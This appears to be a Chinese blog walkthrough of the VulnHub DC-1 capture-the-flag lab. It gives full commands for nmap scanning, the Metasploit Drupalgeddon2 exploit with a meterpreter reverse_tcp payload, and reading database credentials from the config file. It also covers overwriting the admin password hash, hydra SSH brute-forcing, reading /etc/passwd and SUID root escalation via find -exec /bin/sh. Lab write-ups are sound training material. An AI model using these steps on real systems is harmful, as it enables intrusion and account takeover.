DC1靶场渗透

已于 2023-08-04 17:22:22 修改
阅读量125 收藏
点赞数 1
文章标签: 安全
于 2023-08-03 15:09:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/q1234syr_/article/details/132077234
版权

D1靶机渗透

今天我们来学习D1靶机渗透找出所有flag

开始进行靶机下载地址:

链接: https://www.vulnhub.com/entry/dc-1,292/
在靶机下载后,将模式改为NAT模式,重启靶机

第一步:靶机信息收集

// nmap查询存活主机
nmap -sP 192.168.109.0/24

发现靶机地址
在这里插入图片描述查询开放端口

// nmap查询查询开放端口
nmap -sV -p- 192.168.109.135

在这里插入图片描述
打开80端口查看网页
在这里插入图片描述
发现cms版本为7(火狐插件Wappalyzer,需要的话自行下载)

网上查找关于Drupal 7版本的漏洞
发现可以利用msf进行攻击提取shell

// 攻击msf
msfconsole 

// 查找攻击模块drupa
msf6 > search drupa


选择use1

// 查找payLoad
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show payloads

在这里插入图片描述
选择reverse_tcp 然后进行一系列操作设置

// 选择payLoad reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload /php/meterpreter/reverse_tcp

// 显示
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

// 添加靶机IP
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.109.135

// 攻击(用run也可以)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

提权成功:
在这里插入图片描述

第二步:查找flag1(python反弹shell)

查看一下基本信息
在这里插入图片描述
使用python进行反弹shell

// python shell
python -c "import pty;pty.spawn('/bin/bash')"

查找到第一个flag
在这里插入图片描述

第三步:查找flag2、3(数据库操作)

百度翻译

那就看一下他的配置吧
配置文件以set开头(不懂就百度一下) 那就查找一下吧(用通配符查找)

// 查找payLoad
www-data@DC-1:/var/www$ find -name "set*"

直接查看就好了
在这里插入图片描述
又是新的提示呦
在这里插入图片描述
还告诉你数据库名 用户名 密码了,直接登录

// sql登录
C-1:/var/www$ mysql -udbuser -pR0ck3t

进入drupaldb数据库

// 进入drupaldb数据库
mysql> use drupaldb

展示数据库中的表

// 展示数据库中的表
mysql> show tables

在这里插入图片描述

// 查看users表中的内容
select * from users;

在这里插入图片描述
发现密码进行了hash复杂加密,我们进行重置密码为admin,利用自带的脚本

// 重置密码为admin(加密hash)
www-data@DC-1:/var/www$ php scripts/password-hash.sh admin

在这里插入图片描述
用数据库用户名密码进行数据库,进入drupaldb库,显示表users 更新user表命令

// 进入drupaldb数据库中
www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t 
mysql> show databases;
mysql> use drupaldb;
mysql> show tables;

// 更新users表 修改密码wei admin 
mysql> update users set pass="$S$DXrQpEHyj6pIf1xu0wJn3gjiVpK2pO3ZPZCpNQJYGkrBOR1vcCks" where uid=1;

修改成功

进入网页,输入用户名admin密码admin
在这里插入图片描述
然后点点点,找到flag字样提示
在这里插入图片描述
由图可知,我们需要找到etc/password下提示在这里插入图片描述

第四步:查找flag4(ssh连接)

www-data@DC-1:/var/www$ cat /etc/passwd
在这里插入图片描述
发现了一个名为flag4的用户名,尝试用kail里的hydra进行破解
上命令图(大佬链接下借鉴)
在这里插入图片描述

// hydra破解密码 
 hydra -l flag4 -P /usr/share/john/password.lst 192.168.109.135 ssh -vV -f -o hydra.sh

这个命令的含义如下:

-l:使用登录名进行登录
-P:使用密码字典/usr/share/john/password.lst 进行破解
** -v/-V/-d 详细模式/显示login+pass每个尝试/调试模式
-f: 在找到用户名或密码时退出
-o: 将破解成功的用户名写入文件hydra.sh**

这里帮大家罗列出hydra破解不同协议密码常用的命令
在这里插入图片描述
最后破解成功:
在这里插入图片描述
通过ssh进入

// 更新users表 修改密码wei admin 
ssh flag4@192.168.109.135

发现flag4.txt
在这里插入图片描述

第五步:查找最终(SUID提权)

让用相同方法去查找根目录(root)
在这里插入图片描述
要进行SUID提权
不了解SUID的可以参考大佬的链接哦
链接: https://blog.youkuaiyun.com/qq_51524329/article/details/121865922

flag4@DC-1:~$ find / -perm -u=s -type f 2>/dev/null

/:表示从文件系统的顶部(根)开始并找到每个目录
-perm: 表示搜索随后的权限
-u = s:表示查找root用户拥有的文件
-type:表示我们正在寻找的文件类型
f :表示常规文件,而不是目录或特殊文件
2:表示该进程的第二个文件描述符,即stderr(标准错误)

//建一个文件提权
flag4@DC-1:~$ mkdir QWE
flag4@DC-1:~$ find QWE -exec "whoami" \'
flag4@DC-1:~$ find QWE -exec "/bin/sh" \;

提权成功:
在这里插入图片描述
直接查看最后的flag即可:

最后恭喜大家顺利通关 撒花✿✿ヽ(°▽°)ノ✿

q1234syr_
关注
厂商资源分享网站
qq_56248592的博客
10-03 7445
华为(Huawei)是一家全球知名的电信设备和消费电子产品制造商,成立于1987年,总部位于中国深圳。专注于Web应用程序的安全风险,发布了十大最佳Web应用程序安全风险列表,帮助开发人员和安全专家了解和防范常见的Web应用程序安全风险。综上所述,这些公司、组织及社区在网络安全、云计算、大数据、人工智能等领域有着丰富的研究经验和成果,为相关行业和领域的发展做出了重要贡献。专注于网络安全的技术社区,提供安全资讯、技术交流和安全培训等服务,致力于提升网络安全领域的技术水平和安全意识。
DC1 靶场渗透
weixin_45923156的博客
12-05 527
查看这个php文件内容,成功发现flag2的文件地点,发现flag2在mysql里,因为没有开放mysql外部端口,所以只能本地登录。根据提示说明在shadow文件中,但是这个文件只能root用户查看,但是有一个相似文件,为passwd文件。查看此文件发现有一个flag4用户,其目录下有个flag文件(其实一开始用find寻找就发现了)看样子flag4用户没啥用处,看来需要提权,再次查看flag3发现还有一个-exec提示我们。并未找到破解密码的,但是找到了加密密码的,查看源码发现需要使用php运行。
DC1靶场渗透流程(超详细)
m0_64583632的博客
04-01 580
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
VulnHub DC1靶机渗透测试
weixin_44614631的博客
08-25 1113
对VulnHub DC1靶机进行渗透测试。最终,得到了四个flag和一个thefinalflag,共5个flag。有两个问题不是特别清楚,需要再进一步学习。 根据网络上两篇博文学习,总结。如果有版权问题,请联系我进行修改或删除...
DC1靶机渗透测试
Huangshanyoumu的博客
04-16 870
Vuln hub 渗透测试实战 Vulnhub是一个开放的安全靶场,我们可以使用它所提供的环境进行渗透测试实战。 DC所有环境下载地址:https://www.vulnhub.com/series/dc,199/ 环境搭建: 1.下载 OVA(Open Virtualization Appliance:开放虚拟化设备)https://www.vulnhub.com/entry/dc-1-1,292/ 2.拖入 VMware 打开,配置相关设置,开启运行 3.打开 Kali Linux 进行渗透 1.探测
Vulnhub系列之DC1靶场详解
weixin_54960572的博客
08-09 661
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
DC-1渗透测试
sucker的博客
10-27 1484
进入数据库后想更改密码,但是密码是进行了专门加密的,当知道了系统下自带加密脚本,于是我借助加密脚本生成了一个符合系统的密码,并且将数据库。下有什么,然后把想用的密码传入脚本,然后让脚本自动加密生成一个系统支持的密码形式。搜索总共有七个漏洞可以利用,其中第一个经过测试是可以成功的,复制粘贴一下。使用更改后的密码,登陆上网站后,拿到了。)并将它与当前的终端关联起来,然后在新的伪终端内启动一个。、首先我将测试机的网站进行了扫描,由此发现它的框架版本是。成功找到账户和密码,但密码进行了加密,使用。
DC系列靶场---DC 1靶场渗透测试(一)
zhouA0221的博客
07-17 1618
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
DC-1靶场渗透测试总结与全流程思路+后期复盘
m0_74220316的博客
11-20 937
在此靶场中,使用了metaspolit的基础操作,但是并未涉及到木马生成与上传然后getshell,然后我们获取到了CMS的关键配置文件,然后对靶机中的passwdCMS的信息搜集与利用,漏洞披露,关键配置文件目标上存在的用户信息,用户权限详情网站的后台管理页面探测,网站密码的生成策略数据库入侵的操作,对于加密密码的处理对于当前用户的权限提升(非root)
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC1靶场通关详细记录文档记录了渗透测试者在DC1靶场中进行渗透测试的全过程,包括对目标系统的侦察、信息收集、漏洞分析、攻击方法、提升权限等关键步骤。详细记录不仅帮助测试者回顾整个渗透测试过程中的发现与决策...
入门靶机:DC-1渗透测试
lga0325的博客
12-22 768
看不懂,但会抄
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1773
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
DC系列之DC-1渗透测试
qq_45392044的博客
12-23 1003
例如:当spider访问一个网站(http://www.xxx.com)时,首先会检查该网站中是否存在http://www.xxx.com/robots.txt这个文件,如果 Spider找到这个文件,它就会根据这个文件的内容,来确定它访问权限的范围。如果有一些命令具有suid标志,说明这个命令在执行的过程中,会短暂的获得(其实不短暂)root权限,如果我们通过这些拥有suid标志的命令去调用bash的话,这个bash也会继承suid权限,也就会继承root权限。那我们怎么去寻找有suid标识的命令呢?
芯片软错误概率探究:基于汽车芯片安全设计视角
ANSILIC的博客
04-30 1329
本文深入剖析了芯片软错误概率问题,结合 AEC-Q100 与 IEC61508 标准,以 130 纳米工艺 1Mbit RAM 芯片为例阐述其软错误概率,探讨汽车芯片安全等级划分及软错误对汽车关键系统的影响,分析先进工艺下软错误变化趋势,并提出相应的应对策略,旨在为芯片在汽车等安全关键领域的应用提供理论参考与实践指导,保障电子系统可靠性。
基于STM32、HAL库的ATECC608B安全验证及加密芯片驱动程序设计
corlin6688的博客
04-29 220
注意:ATECC608B的I2C地址通常是0x60(7位地址)基于硬件的高安全性加密算法。ECC P-256加密引擎。真随机数生成器(TRNG)I²C接口(最高1MHz)低功耗设计,适合物联网应用。SHA-256哈希算法。16KB安全存储空间。
基于STM32、HAL库的DS2401P安全验证及加密芯片驱动程序设计
corlin6688的博客
04-28 306
1 |--DATA---------->| GPIO (配置为开漏输出)// 检测存在脉冲(设备应在60-240us内拉低总线)// 初始化DS2401P,使用GPIOB, PIN5。// 发送读取ROM命令 (0x33)// 微秒级延迟函数(需要根据系统时钟配置)// 释放总线(上拉电阻将拉高)工作温度范围:-40°C至+85°C。// 配置为开漏输出,无上拉。// 拉低总线至少480us。// 打印ROM信息。// 发送复位脉冲并检测存在脉冲。// 读取DS2401P的ROM。
企业 AD 域安全10大风险场景解析
运维有小邓
04-28 583
Active Directory(AD)作为大多数组织的信息管理中枢,在身份验证与访问控制中发挥着至关重要的作用。这也使其成为网络犯罪分子觊觎的目标,他们不断寻找漏洞以窃取关键数据。为了有效防御AD环境遭受攻击,了解常见的攻击手段以及制定全面的防护策略至关重要。本文将带你了解十大常见AD攻击类型,并介绍如何快速检测和防护。
内存安全的攻防战:工具链与语言特性的协同突围
最新发布
2501_90200491的博客
05-01 474
C++ 的内存安全攻坚战,本质上是工具链创新、语言特性进化、开发范式转变的系统性工程。当 Clang 的静态分析、SaferCPlusPlus 的安全抽象、GCC 的编译器优化形成合力,内存安全问题正从 "随机地雷" 转变为 "可控风险"。对于开发者而言,掌握 "静态分析早发现、安全库防患未然、编译器优化兜底" 的三层防御体系,才能在高性能与高安全的平衡中占据主动。
基于STM32、HAL库的AT88SC0104CA安全验证及加密芯片驱动程序设计
corlin6688的博客
04-29 88
/ 初始化AT88SC0104CA。// 配置Digital滤波器。// 简单检查I2C是否就绪。// 初始化失败处理。// 认证密码 (示例密码)// 数据不一致处理。// 配置Analog滤波器。// 检查密码修改是否成功。// 比较写入和读取的数据。// 检查写操作是否成功。// 写入数据到用户区1。// 从用户区1读取数据。
dc1靶机渗透测试获取flag过程需用到searchsploit drupal
09-10
DC1靶机的Drupal渗透测试任务中,当你遇到涉及searchsploit和Drupal的情况,通常是在寻找利用Drupal漏洞的payload或exploit套件。Drupal是一个流行的开源内容管理系统,searchsploit是Metasploit Framework中的一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值